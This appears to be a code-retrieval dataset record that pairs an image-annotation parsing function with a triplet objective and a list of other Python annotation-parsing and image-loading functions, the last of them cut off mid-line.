def parse_anno(self, img_path, anno_path) -> dict: anno_obj = dict() img = cv2.imread(img_path) if len(img.shape) == 3: h, w, d = img.shape[:3] anno_obj['size'] = (w, h, d) else: h, w = img.shape[:2] anno_obj['size'] = (w, h, 1) anno_array = np.loadtxt(anno_path, dtype=np.str, delimiter=',') objects = list() if len(anno_array.shape) == 1: # Just one annotation object obj = self.create_anno(anno_array) if obj: objects.append(obj) else: for anno_line in anno_array: obj = self.create_anno(anno_line) if obj: objects.append(obj) if len(objects) == 0: return dict() anno_obj['objects'] = objects return anno_obj
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def unpack_annotation(path):\n buffer = []\n with open(path, 'r') as file:\n lines = file.read()\n\n lines = lines.splitlines()\n for line in lines:\n if not line.startswith('#') and line:\n buffer.append(line)\n\n # Filename to match annotation with photo\n filename = ''\n for line in buffer:\n if 'Image filename' in line:\n filename = line.replace(' ', '').split(':')[1]\n\n # How many person-like objects in photo\n how_many = 0\n for line in buffer:\n if 'Objects with ground truth' in line:\n how_many = int((line.replace(' ', '').split(':')[1][0]))\n break\n\n person_id = []\n for i in range(how_many):\n person_id.append(f'{i+1} \"PASperson\"')\n\n # Centers of objects\n centers = []\n which_one = 0\n for line in buffer:\n if which_one == how_many:\n break\n if person_id[which_one] + ' (X, Y)' in line:\n buf = line.replace(\" \", \"\").split(':')[1]\n buf = buf.replace('(', \"\").replace(')', '').split(',')\n centers.append((int(buf[0]), int(buf[1])))\n which_one += 1\n\n # Bounding boxes of objects\n boxes = []\n which_one = 0\n for line in buffer:\n if which_one == how_many:\n break\n if person_id[which_one] + ' (Xmin, Ymin)' in line:\n buf = line.replace(\" \", \"\").split(':')[1]\n buf = buf.replace('(', \"\").replace(')', '').split('-')\n buf0 = buf[0].split(',')\n buf1 = buf[1].split(',')\n boxes.append((int(buf0[0]), int(buf0[1]), int(buf1[0]), int(buf1[1])))\n which_one += 1\n\n return filename, how_many, centers, boxes", "def parse_rec(json_dataset, index):\n info = voc_info(json_dataset)\n data_path = info['data_path']\n image_file = os.path.join(data_path, 'images', index + '.jpg')\n assert os.path.exists(image_file), 'Path does not exist: {}'.format(image_file)\n\n height, width = cv2.imread(image_file).shape[:2]\n annopath = os.path.join(data_path, 'annotations', '{:s}.txt')\n filename = annopath.format(index)\n rotate = 0\n objects = []\n with open(filename) as f:\n line = f.readline()\n while line:\n parts = line.split()\n if parts[0] == 'rotate':\n rotate = int(parts[1])\n assert rotate == 0\n else:\n obj_struct = {'name': parts[0]}\n x1 = min(max(int(parts[1]), 0), width - 1)\n y1 = min(max(int(parts[2]), 0), height - 1)\n x2 = min(max(int(parts[3]), 0), width - 1)\n y2 = min(max(int(parts[4]), 0), height - 1)\n obj_struct['bbox'] = [x1, y1, x2, y2]\n obj_struct['truncated'] = int(parts[5])\n obj_struct['difficult'] = 0\n objects.append(obj_struct)\n line = f.readline()\n\n return objects", "def extract_data(filename: str, directory: str) -> Dict:\n with open(filename) as f:\n lines = f.readlines()\n\n # Split data by :\n annotations = [line.replace(\" \", \"\").split(\":\") for line in lines]\n\n # Split data by ;\n for annotation in annotations:\n annotation[1] = annotation[1].split(\";\")\n\n # Loop for saving metadata into dictionary\n annot_dict = dict()\n for annotation in annotations:\n img = annotation[0]\n bbox_metadata = annotation[1]\n bbox = list()\n \n # Path to images\n img_path = os.path.join(directory, img)\n im = Image.open(img_path)\n width, height = im.size\n\n # Iterate over each bounding box\n for annot in bbox_metadata:\n \n if \"MISC_SIGNS\" == annot:\n signStatus = 'N/A'\n signTypes = \"MISC_SIGNS\"\n signPurpose = 'N/A'\n\n signBB = (-1, -1, -1, -1)\n signC = (-1, -1)\n signSize = 0\n aspectRatio = 0\n\n bbox.append({\"signStatus\": signStatus, \n \"signTypes\": signTypes, \n \"signPurpose\": signPurpose, \n \"signBB\": signBB, \n \"signC\": signC, \n \"signSize\": signSize, \n \"aspectRatio\": aspectRatio})\n elif \"\\n\" in annot:\n pass\n 
else:\n data = annot.split(\",\")\n \n signStatus = data[0] # signStatus\n signTypes = data[6] # signTypes\n signPurpose = data[5] # PROHIBITORY, WARNING, OTHER, INFORMATION\n tl_x, tl_y, br_x, br_y = data[3], data[4], data[1], data[2]\n \n if is_valid_decimal(tl_x):\n tl_x = float(tl_x)\n else:\n tl_x = float(cutoff_letter(tl_x))\n\n if is_valid_decimal(tl_y):\n tl_y = float(tl_y)\n else:\n tl_y = float(cutoff_letter(tl_y))\n\n if is_valid_decimal(br_x):\n br_x = float(br_x)\n else:\n br_x = float(cutoff_letter(br_x))\n\n if is_valid_decimal(br_y):\n br_y = float(br_y)\n else:\n br_y = float(cutoff_letter(br_y))\n\n if tl_x < 0:\n tl_x = 0\n elif tl_x > width:\n tl_x = width\n \n if tl_y < 0:\n tl_y = 0\n elif tl_y > height:\n tl_y = height\n \n if br_x < 0:\n br_x = 0\n elif br_x > width:\n br_x = width\n \n if br_y < 0:\n br_y = 0\n elif br_y > height:\n br_y = height\n\n signBB = (tl_x, tl_y, br_x, br_y)\n signC = (br_x + tl_x)/2, (br_y + tl_y)/2\n signSize = (br_x - tl_x) * (br_y - tl_y)\n aspectRatio = (br_x - tl_x) / (br_y - tl_y)\n\n bbox.append({\"signStatus\": signStatus, \n \"signTypes\": signTypes, \n \"signPurpose\": signPurpose, \n \"signBB\": signBB, \n \"signC\": signC, \n \"signSize\": signSize, \n \"aspectRatio\": aspectRatio})\n \n \n annot_dict[img_path] = bbox\n return annot_dict", "def load_annos(self, anno_path):\n\n if os.path.exists(anno_path) is False or os.path.isfile(anno_path) is False or anno_path.endswith('txt') is False:\n print(\"Wrong path: not exist or not a txt file: %s\" % anno_path)\n return None, None\n\n list_file_id, list_anno_id = [], []\n list_x, list_y, list_w, list_h = [], [], [], []\n list_blur, list_expr, list_illum, list_occ, list_pose, list_inval = [], [], [], [], [], []\n anno_id = 0\n\n list_id = []\n list_filename = []\n file_id = 0\n\n num_annos_total = 0\n\n with open(anno_path) as afile:\n line = \"begin\"\n while line != \"\":\n line = afile.readline()\n\n if line.rstrip().endswith('jpg'): # it is a file\n file_name = line.strip()\n list_id.append(file_id)\n list_filename.append(file_name)\n\n num_annos = int(afile.readline().strip())\n\n for i in range(num_annos):\n px, py, pw, ph, blur, expr, illum, inval, occ, pose = afile.readline().strip().split(' ')\n px, py, pw, ph = int(px), int(py), int(pw), int(ph)\n\n if pw == 0 or ph == 0: # ignore invalid faces (0 width or height)\n continue\n\n if pw < 0:\n px = px+pw\n pw = abs(pw)\n if ph < 0:\n py = py+ph\n ph = abs(ph)\n\n list_file_id.append(file_id)\n list_anno_id.append(anno_id)\n list_x.append(px)\n list_y.append(py)\n list_w.append(pw)\n list_h.append(ph)\n list_blur.append(int(blur))\n list_expr.append(int(expr))\n list_illum.append(int(illum))\n list_occ.append(int(occ))\n list_pose.append(int(pose))\n list_inval.append(int(inval))\n anno_id = anno_id + 1\n\n file_id = file_id + 1\n num_annos_total += num_annos\n\n files = {'id': np.array(list_id), 'filename': list_filename }\n annos = {'file_id': np.array(list_file_id), 'anno_id': np.array(list_anno_id), \\\n 'x': np.array(list_x), 'y': np.array(list_y), \\\n 'w': np.array(list_w), 'h': np.array(list_h), \\\n 'blur': np.array(list_blur), 'expression': np.array(list_expr), \\\n 'illumination': np.array(list_illum), 'occlusion': np.array(list_occ), \\\n 'pose': np.array(list_pose), 'invalid': np.array(list_inval) }\n\n assert (len(list_id) == len(list_filename)), \\\n \"file_id and filename lists should have the same length\"\n\n self._num_annos = num_annos_total\n self._num_images = file_id\n\n return files, annos", "def 
process(self, image):", "def _ann_parser(self):\n pd = tfds.core.lazy_imports.pandas\n with tf.io.gfile.GFile(self.ann_path) as csv_f:\n # read file\n df = pd.read_csv(csv_f, sep=',')\n\n # split\n return {'train_val': df[df['Image Index'].isin(self.train_val_list)],\n 'test': df[df['Image Index'].isin(self.test_list)]\n }", "def process_cvat_xml(xml_file, image_dir, output_dir):\n KNOWN_TAGS = {'box', 'image', 'attribute'}\n #output_dir = os.path.join(output_dir, \"Annotations\")\n os.makedirs(output_dir, exist_ok=True)\n cvat_xml = etree.parse(xml_file)\n\n basename = os.path.splitext( os.path.basename( xml_file ) )[0]\n\n tracks= cvat_xml.findall( './/track' )\n\n if (tracks is not None) and (len(tracks) > 0):\n frames = {}\n\n for track in tracks:\n trackid = int(track.get(\"id\"))\n label = track.get(\"label\")\n boxes = track.findall( './box' )\n for box in boxes:\n frameid = int(box.get('frame'))\n outside = int(box.get('outside'))\n ## occluded and pose are not tested within tracks\n occluded = 0 ## Default if not found\n if 'occluded' in box.attrib: ## this is an attribute of 'box' element\n occluded = int(box.get('occluded'))\n pose = 'Unspecified'\n for attr in box.findall('attribute'):\n if (attr.get('name') == 'type'): ## Used for view type\n pose = attr.text\n #keyframe = int(box.get('keyframe')) #currently unused\n xtl = float(box.get('xtl'))\n ytl = float(box.get('ytl'))\n xbr = float(box.get('xbr'))\n ybr = float(box.get('ybr'))\n \n frame = frames.get( frameid, {} )\n \n if outside == 0:\n frame[ trackid ] = { 'xtl': xtl, 'ytl': ytl, 'xbr': xbr, 'ybr': ybr, 'label': label,\n 'pose': pose, 'truncated': occluded }\n\n frames[ frameid ] = frame\n\n width = int(cvat_xml.find('.//original_size/width').text)\n height = int(cvat_xml.find('.//original_size/height').text)\n\n # Spit out a list of each object for each frame\n for frameid in sorted(frames.keys()):\n print( frameid )\n\n image_name = \"%s_%08d.jpg\" % (basename, frameid) ## KM: Revisit this for tracks. Hardcoded?\n image_path = os.path.join(image_dir, image_name)\n if not os.path.exists(image_path):\n log.warn('{} image cannot be found. Is `{}` image directory correct?'.\n format(image_path, image_dir))\n writer = Writer(image_path, width, height)\n\n frame = frames[frameid]\n\n objids = sorted(frame.keys())\n\n for objid in objids:\n\n box = frame[objid]\n\n label = box.get('label')\n occluded = box.get('occluded')\n pose = box.get('pose')\n xmin = float(box.get('xtl'))\n ymin = float(box.get('ytl'))\n xmax = float(box.get('xbr'))\n ymax = float(box.get('ybr'))\n\n writer.addObject(label, xmin, ymin, xmax, ymax, pose, occluded)\n\n anno_name = os.path.basename(os.path.splitext(image_name)[0] + '.xml')\n anno_dir = os.path.dirname(os.path.join(output_dir, image_name))\n os.makedirs(anno_dir, exist_ok=True)\n writer.save(os.path.join(anno_dir, anno_name))\n\n else:\n for img_tag in cvat_xml.findall('image'):\n ## Discard path component; we expect user to provide path to images directory.\n ## It is probably easier for users to provide full path to images directory\n ## rather than having to figure out how much of the path is embedded in the XML\n ## as a relative or absolute path by CVAT.\n image_name = os.path.basename(img_tag.get('name'))\n width = img_tag.get('width')\n height = img_tag.get('height')\n image_path = os.path.join(image_dir, image_name)\n if not os.path.exists(image_path):\n log.warn('{} image cannot be found. 
Is `{}` image directory correct?'.\n format(image_path, image_dir))\n writer = Writer(image_path, width, height)\n\n unknown_tags = {x.tag for x in img_tag.iter()}.difference(KNOWN_TAGS)\n if unknown_tags:\n log.warn('Ignoring tags for image {}: {}'.format(image_path, unknown_tags))\n\n for box in img_tag.findall('box'):\n label = box.get('label')\n occluded = 0 ## Default if not found\n if 'occluded' in box.attrib: ## this is an attribute of 'box' element\n occluded = int(box.get('occluded'))\n pose = 'Unspecified' ## Default if not found\n for attr in box.findall('attribute'):\n if (attr.get('name') == 'type'): ## Used for view type\n pose = attr.text\n\n xmin = float(box.get('xtl'))\n ymin = float(box.get('ytl'))\n xmax = float(box.get('xbr'))\n ymax = float(box.get('ybr'))\n\n writer.addObject(label, xmin, ymin, xmax, ymax, pose, occluded)\n\n anno_name = os.path.basename(os.path.splitext(image_name)[0] + '.xml')\n anno_dir = output_dir #os.path.dirname(os.path.join(output_dir, image_name))\n os.makedirs(anno_dir, exist_ok=True)\n #print(\"Writing {} (image: {})\".format(anno_name, image_name))\n writer.save(os.path.join(anno_dir, anno_name))", "def parse_annotation(xml_path):\n\n tree = ET.parse(xml_path)\n root = tree.getroot()\n images = root.findall('image')\n print('[/] total number of image annotations present: {}'.format(len(images)))\n\n image2annotation = {}\n for image in images:\n image_id = image.attrib['id']\n image2annotation[image_id] = []\n\n for box in image.findall('box'):\n label = box.attrib['label']\n # skip if label is not head\n if label != \"head\":\n continue\n\n annotation = {}\n minx, miny = int(float(box.attrib['xtl'])), int(float(box.attrib['ytl']))\n maxx, maxy = int(float(box.attrib['xbr'])), int(float(box.attrib['ybr']))\n\n # parse attributes for the box and create labels accordingly\n safety_helmet, mask = False, False\n for attribute in box.findall('attribute'):\n if attribute.attrib['name'] == 'has_safety_helmet' and attribute.text == 'yes':\n safety_helmet = True\n elif attribute.attrib['name'] == 'mask' and attribute.text == 'yes':\n mask = True\n\n # 3 classes: mask+safety_helmet, safety_helmet and mask\n if safety_helmet and mask:\n class_label = \"mask+safety_helmet\"\n elif safety_helmet:\n class_label = \"safety_helmet\"\n elif mask:\n class_label = \"mask\"\n\n # save bbox coordinates and class label.\n annotation['bbox'] = [minx, miny, maxx, maxy]\n annotation['class'] = class_label\n image2annotation[image_id].append(annotation)\n\n\n return image2annotation", "def read_annotation_yolov5(bbox_path):\n\n # image_paths = get_lists_in_dir(rawImage_dir)\n\n dw = 1./(camera_resolution[0]) # 1 / image width\n dh = 1./(camera_resolution[1]) # 1 / image height\n\n # Read in bbox coordinate information from bbox_information.txt\n dimension_list = []\n with open(bbox_path, 'r') as annotation_file:\n content = annotation_file.read().splitlines()\n\n for n in content:\n # x = int(n.split()[0])+int(n.split()[2])/2\n # y = int(n.split()[1])+int(n.split()[3])/2\n # w = int(n.split()[2])\n # h = int(n.split()[3])\n #\n # x = x*dw\n # w = w*dw\n # y = y*dh\n # h = h*dh\n\n bb = n.split()\n w = int(bb[2])\n h = int(bb[3])\n\n start_x = int(bb[0])\n start_y = int(bb[1])\n\n center_x = start_x + w / 2\n center_y = start_y + h / 2\n\n x = center_x * dw\n y = center_y * dh\n w = w * dw\n h = h * dh\n \n dimension_list.append((x, y, w, h))\n\n return dimension_list", "def __init__(self, filepath: str):\n self.filetype: str = filepath[len(filepath) - 3:].upper()\n 
self.tags = None\n self.locations: [Location] = None\n self.intermediaryImage = None\n self.outlined = None\n if self.filetype == 'TIF':\n print('found tif')\n with TiffFile(filepath) as tif:\n # fileInfo(tif)\n self.tags = metadataGeoTags(tif)\n self.image = tif.asarray()\n elif self.filetype == 'PNG' or self.filetype == 'JPG':\n print('found png')\n self.image = cv2.imread(filepath, cv2.IMREAD_UNCHANGED)\n else:\n print('invalid file type:', self.filetype)", "def parse(outPath):\n # def _parse_id(line):\n # \"\"\"parse out the COCO id from the 'cp ...' line \"\"\"\n # pat = re.compile('(?<=[0-9]{16}_)[0-9]+') # matches numbers preceded by 16 numbers followed by a '_'\n # mat = pat.search(line)\n # assert not mat is None, (\"this line does not contain a COCO image id: {}\" % line )\n\n # s, e = mat.start(), mat.end()\n # return line[s:e], line[e+1:e+5] \n\n def _parse_id(line):\n \"\"\"parse out the new format as in [no_text_has_instances.out]\"\"\"\n ablt_pat = re.compile('(?<=2014_)[0-9]{12}(?=.jpg)')\n orig_pat = re.compile('(?<=[0-9]{16}_)[0-9]+')\n mat = ablt_pat.search(line)\n if mat is None: #original image\n mat = orig_pat.search(line)\n assert not mat is None, (\"this line does not contain a COCO image id: {}\" % line )\n return line[mat.start(): mat.end()], 'orig'\n else: #ablated image\n num = line[mat.start(): mat.end()]\n return str(int(num)), 'ablt'\n\n with open(outPath, 'r') as f:\n print \"Reading out file...\"\n content = f.read()\n \n l = content.split('\\n')\n pattern = re.compile('^cp|^image')\n l = [x for x in l if pattern.search(x)]\n id_lines, cap_lines = l[::2],l[1::2]\n\n d = OrderedDict() #dictionary from COCO-id to (orig_cap, new_cap)\n\n print \"Parsing img ids and captions...\"\n for idx, id_line in enumerate(id_lines):\n cap = cap_lines[idx].split(':')[-1].strip()\n cocoid, cat = _parse_id(id_line)\n if not cocoid in d:\n d[cocoid] = {}\n d[cocoid][cat] = cap\n\n print \"Computing scores...\"\n #compute scores, need to preprocess all ablated captions and original captions\n stoplist = set('for a of the and to in its his her'.split())\n #believe that ordered dict guarantees iteration order!!!\n ablated, original = [ d[k]['ablt'] for k in d.keys()], [ d[k]['orig'] for k in d.keys()]\n ablated, original = pre_process(ablated, ignore=stoplist),pre_process(original, ignore=stoplist)\n scores = map(lambda x: calc_inter_union(*x), zip(ablated, original))\n for idx, k in enumerate(d.keys()):\n d[k]['score'] = scores[idx]\n\n #get ablation method\n l = id_lines[0]\n if 'blackout' in l:\n d['ablation_method'] = 'blackout'\n elif 'median_bg' in l:\n d['ablation_method'] = 'median_bg'\n elif 'gaussian' in l:\n d['ablation_method'] = 'gaussian'\n elif 'median' in l:\n d['ablation_method'] = 'median'\n elif 'destroy' in l:\n d['ablation_method'] = 'destroy'\n\n\n print \"The output ablation method is \\\"%s\\\"\" % d['ablation_method']\n return d", "def process_image(self):\n pass", "def pull_anno(self, index):\n img_path = list(self.annotation.keys())[index]\n return img_path[img_path.rfind(\"/\") + 1 : img_path.rfind(\".\")], self.annotation[img_path]", "def _parse_ann_info(self, img_info, ann_info):\r\n gt_bboxes = []\r\n gt_labels = []\r\n gt_bboxes_ignore = []\r\n gt_masks_ann = []\r\n\r\n for i, ann in enumerate(ann_info):\r\n if ann.get('ignore', False):\r\n continue\r\n x1, y1, w, h = ann['bbox']\r\n if ann['area'] <= 0 or w < 1 or h < 1:\r\n continue\r\n bbox = [x1, y1, x1 + w - 1, y1 + h - 1]\r\n if ann.get('iscrowd', False):\r\n 
gt_bboxes_ignore.append(bbox)\r\n else:\r\n gt_bboxes.append(bbox)\r\n gt_labels.append(self.cat2label[ann['category_id']])\r\n gt_masks_ann.append(ann['segmentation'])\r\n\r\n if gt_bboxes:\r\n gt_bboxes = np.array(gt_bboxes, dtype=np.float32)\r\n gt_labels = np.array(gt_labels, dtype=np.int64)\r\n else:\r\n gt_bboxes = np.zeros((0, 4), dtype=np.float32)\r\n gt_labels = np.array([], dtype=np.int64)\r\n\r\n if gt_bboxes_ignore:\r\n gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)\r\n else:\r\n gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)\r\n\r\n seg_map = img_info['filename'].replace('jpg', 'png')\r\n\r\n ann = dict(\r\n bboxes=gt_bboxes,\r\n labels=gt_labels,\r\n bboxes_ignore=gt_bboxes_ignore,\r\n masks=gt_masks_ann,\r\n seg_map=seg_map)\r\n\r\n return ann", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n frame_dir = video_info['filename']\n video_info['filename'] = osp.join(self.data_prefix, video_info['filename'])\n video_info['frame_dir'] = frame_dir\n video_info['index'] = i\n \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def parse_annotations(Hinv, obsmat_txt):\n\n def to_image_frame(loc):\n \"\"\"\n Given H^-1 and (x, y, z) in world coordinates,\n returns (u, v, 1) in image frame coordinates.\n \"\"\"\n loc = np.dot(Hinv, loc) # to camera frame\n return loc / loc[2] # to pixels (from millimeters)\n\n mat = np.loadtxt(obsmat_txt)\n num_peds = int(np.max(mat[:, 1])) + 1\n peds = [np.array([]).reshape(0, 4) for _ in range(num_peds)] # maps ped ID -> (t,x,y,z) path\n\n num_frames = (mat[-1, 0] + 1).astype(\"int\")\n num_unique_frames = np.unique(mat[:, 0]).size\n recorded_frames = [-1] * num_unique_frames # maps timestep -> (first) frame\n peds_in_frame = [[] for _ in range(num_unique_frames)] # maps timestep -> ped IDs\n\n frame = 0\n time = -1\n blqk = False\n for row in mat:\n if row[0] != frame:\n frame = int(row[0])\n time += 1\n recorded_frames[time] = frame\n\n ped = int(row[1])\n\n peds_in_frame[time].append(ped)\n loc = np.array([row[2], row[4], 1])\n loc = to_image_frame(loc)\n loc = [time, loc[0], loc[1], loc[2]]\n peds[ped] = np.vstack((peds[ped], loc))\n\n return recorded_frames, peds_in_frame, peds", "def _parse_ann_info(self, img_info, ann_info):\n gt_bboxes = []\n gt_labels = []\n gt_bboxes_ignore = []\n gt_masks_ann = []\n gt_sample_sites = []\n\n gt_point_coords = []\n gt_point_labels = []\n\n for i, ann in enumerate(ann_info):\n if ann.get(\"ignore\", False):\n continue\n x1, y1, w, h = ann[\"bbox\"]\n inter_w = max(0, min(x1 + w, img_info[\"width\"]) - max(x1, 0))\n inter_h = max(0, min(y1 + h, img_info[\"height\"]) - max(y1, 0))\n if inter_w * inter_h == 0:\n continue\n if ann[\"area\"] <= 0 or w < 1 or h < 1:\n continue\n if ann[\"category_id\"] not in self.cat_ids:\n continue\n bbox = [x1, y1, x1 + w, y1 + h]\n if ann.get(\"iscrowd\", False):\n gt_bboxes_ignore.append(bbox)\n else:\n gt_bboxes.append(bbox)\n gt_labels.append(self.cat2label[ann[\"category_id\"]])\n gt_masks_ann.append(ann.get(\"segmentation\", None))\n if self.kind == \"official\":\n gt_point_coords.append(ann[\"point_coords\"])\n gt_point_labels.append(ann[\"point_labels\"])\n else:\n gt_sample_sites.append(ann[\"sample_sites\"])\n\n if gt_bboxes:\n gt_bboxes = np.array(gt_bboxes, dtype=np.float32)\n gt_labels = np.array(gt_labels, dtype=np.int64)\n else:\n gt_bboxes = 
np.zeros((0, 4), dtype=np.float32)\n gt_labels = np.array([], dtype=np.int64)\n\n if gt_bboxes_ignore:\n gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)\n else:\n gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)\n\n seg_map = img_info[\"filename\"].replace(\"jpg\", \"png\")\n\n ann = dict(\n point_labels=gt_point_labels,\n point_coords=gt_point_coords,\n sample_sites=gt_sample_sites,\n bboxes=gt_bboxes,\n labels=gt_labels,\n bboxes_ignore=gt_bboxes_ignore,\n masks=gt_masks_ann,\n seg_map=seg_map,\n )\n\n return ann", "def read_voc_annotation_file(annotation_file_path, labelmap_dict, has_scores=False):\n root = etree.parse(annotation_file_path)\n image_id = root.find('filename').text\n objects = root.findall('object')\n\n boxes = np.array([]).reshape(0, 4)\n classes = np.array([])\n scores = np.array([])\n\n for item in objects:\n name = item.find('name').text\n class_id = labelmap_dict[name]\n class_array = np.array([class_id])\n classes = np.concatenate([classes, class_array], axis=0)\n\n if has_scores:\n score = item.find('score').text\n score_array = np.array([score]).astype(np.float)\n scores = np.concatenate([scores, score_array], axis=0)\n\n bndbox = item.find('bndbox')\n ymin = bndbox.find('ymin').text\n xmin = bndbox.find('xmin').text\n ymax = bndbox.find('ymax').text\n xmax = bndbox.find('xmax').text\n bndbox_array = np.expand_dims(np.array([ymin, xmin, ymax, xmax]).astype(np.float32), axis=0)\n boxes = np.concatenate([boxes, bndbox_array], axis=0)\n\n if boxes.ndim < 2:\n boxes = np.expand_dims(boxes, axis=0)\n\n classes = classes.astype(np.int32)\n\n if has_scores:\n return image_id, boxes, classes, scores\n else:\n return image_id, boxes, classes", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']+'.avi') \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']] \n else:\n if not self.test_ret:\n video_info['text'] = [rnd.choice(video_info['text'])]\n else:\n video_info['clip_text_candidate'] = list(range(len(video_info['text'])))\n\n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def process_image(file_path):\n img_array = io.imread(file_path)\n detections, shapes, descriptors = detect_faces(person_database,img_array)\n\n names = []\n\n for desc in descriptors:\n name = find_match(person_database, desc)\n names.append(name)\n\n return pic_array, names, detections, shapes, descriptors", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']]\n for text in video_info['text']:\n info = {}\n frame_dir = video_info['filename']\n filename = osp.join(self.data_prefix, video_info['filename']+'.mp4') \n info['filename'] = filename\n info['frame_dir'] = frame_dir\n info['index'] = i\n info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n info['text'] = [text]\n if self.is_ret:\n pass\n elif self.is_mc:\n info['clip_text_candidate'] = [0, 1, 2, 3, 4]\n elif self.is_qa:\n 
pass\n video_infos.append(info) \n del ann_info\n\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name'] if 'filename' not in video_info else video_info['filename']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers'] if 'answers' in video_info else video_info['text']\n info_dict['question'] = video_info['question'] if 'question' in video_info else \"\"\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def parse_function(path,label):\n # Read an image from a file\n image_string = tf.io.read_file(path)\n # Decode it into a dense vector\n image_decoded = tf.image.decode_jpeg(image_string, channels=CHANNELS)\n # Resize it to fixed shape\n image_resized = tf.image.resize(image_decoded, [IMG_SIZE, IMG_SIZE])\n # Normalize it from [0, 255] to [0.0, 1.0]\n image_normalized = image_resized / 255.0\n return image_normalized, label", "def parse_metadata_file(self, file):\n \n file_keys = list(file.keys())\n \n if 'labelAnnotations' in file_keys:\n #file_annots = file['labelAnnotations'][:int(len(file['labelAnnotations']) * 0.5)]\n file_annots = file['labelAnnotations'][:]\n file_top_score = np.asarray([x['score'] for x in file_annots]).mean()\n file_top_desc = [x['description'] for x in file_annots]\n else:\n file_top_score = np.nan\n file_top_desc = ['']\n \n file_colors = file['imagePropertiesAnnotation']['dominantColors']['colors']\n file_crops = file['cropHintsAnnotation']['cropHints']\n\n file_color_score = np.asarray([x['score'] for x in file_colors]).mean()\n file_color_pixelfrac = np.asarray([x['pixelFraction'] for x in file_colors]).mean()\n\n file_crop_conf = np.asarray([x['confidence'] for x in file_crops]).mean()\n \n if 'importanceFraction' in file_crops[0].keys():\n file_crop_importance = np.asarray([x['importanceFraction'] for x in file_crops]).mean()\n else:\n file_crop_importance = np.nan\n\n df_metadata = {\n 'annots_score': file_top_score,\n 'color_score': file_color_score,\n 'color_pixelfrac': file_color_pixelfrac,\n 'crop_conf': file_crop_conf,\n 'crop_importance': file_crop_importance,\n 'annots_top_desc': self.sentence_sep.join(file_top_desc)\n }\n \n df_metadata = pd.DataFrame.from_dict(df_metadata, orient='index').T\n df_metadata = df_metadata.add_prefix('metadata_')\n \n return df_metadata", "def parse(all_blobs, all_angles):", "def _parse_single(filename, label, image_size=IMAGE_SIZE):\n # Decode and convert image to appropriate type\n image = tf.image.decode_png(tf.read_file(filename), channels=image_size[2])\n image = tf.image.convert_image_dtype(image, tf.float32) # Also scales from [0, 255] to [0, 1)\n # Resize according to module requirements\n image = tf.image.resize_images(image, image_size[:2])\n return image, label", "def load_annotations(self, image_index):\n filename = self.image_names[image_index] + '.xml'\n try:\n tree = ET.parse(os.path.join(self.data_dir, 'Annotations', filename))\n return self.__parse_annotations(tree.getroot())\n except ET.ParseError as e:\n raise_from(ValueError('invalid annotations file: {}: {}'.format(filename, e)), None)\n except ValueError as e:\n raise_from(ValueError('invalid annotations file: {}: {}'.format(filename, e)), None)", "def __parse_image(self, image_path: 
str, image_label: int) -> tuple:\n one_hot = tf.one_hot(image_label, self.num_classes, dtype=dtypes.int32)\n img_file = tf.read_file(image_path)\n img_decoded = tf.image.decode_jpeg(img_file, channels=self.image_shape[2])\n img_decoded = tf.image.resize_images(img_decoded, self.image_shape[0:2])\n img_decoded = tf.cast(img_decoded, tf.float32)\n if self.normalize_images:\n img_decoded = tf.image.per_image_standardization(img_decoded)\n\n return img_decoded, one_hot", "def load_annotations(path, img_w, img_h):\n bboxes = []\n with open(path, 'r') as file:\n for row in file:\n _, xc , yc, w, h = row.split()\n xc = float(xc)*img_w\n yc = float(yc)*img_h\n w = float(w)*img_w\n h = float(h)*img_h\n bboxes.append([xc - w/2 , yc - h/2, xc + w/2 , yc + h/2])\n\n return bboxes", "def _parse_raw_labels(self, lines):\r\n images = []\r\n labels = []\r\n idx = 0\r\n while idx < len(lines):\r\n image_path = lines[idx].strip()\r\n images.append(self._real_image_path(image_path))\r\n idx += 1\r\n\r\n num = int(lines[idx])\r\n idx += 1\r\n\r\n labels_ = []\r\n for _ in range(num):\r\n x1, y1, w, h, blur, expression, illumination, invalid, \\\r\n occlusion, pose = [int(v) \r\n for v in lines[idx].strip().split()]\r\n x2, y2 = x1 + w - 1, y1 + h - 1 # -1 to get the read x2, y2\r\n\r\n labels_.append([x1, y1, x2, y2])\r\n idx += 1\r\n \r\n labels.append(np.array(labels_))\r\n\r\n self._data_map[self._real_image_path(image_path)] = np.array(labels_)\r\n return np.array(images), np.array(labels)", "def parse_function(filenames):\n \n img_filename, gt_filename = filenames['image'], filenames.get('segmentation_mask', None)\n \n # Reading the file and returning its content as bytes:\n image_string = tf.io.read_file(img_filename)\n # Decoding into an image:\n image_decoded = tf.io.decode_jpeg(image_string, channels=3)\n\n # Converting image to float:\n image = tf.image.convert_image_dtype(image_decoded, tf.float32)\n\n \n if gt_filename is not None:\n # Same for GT image:\n gt_string = tf.io.read_file(gt_filename)\n gt_decoded = tf.io.decode_png(gt_string, channels=1)\n \n gt = 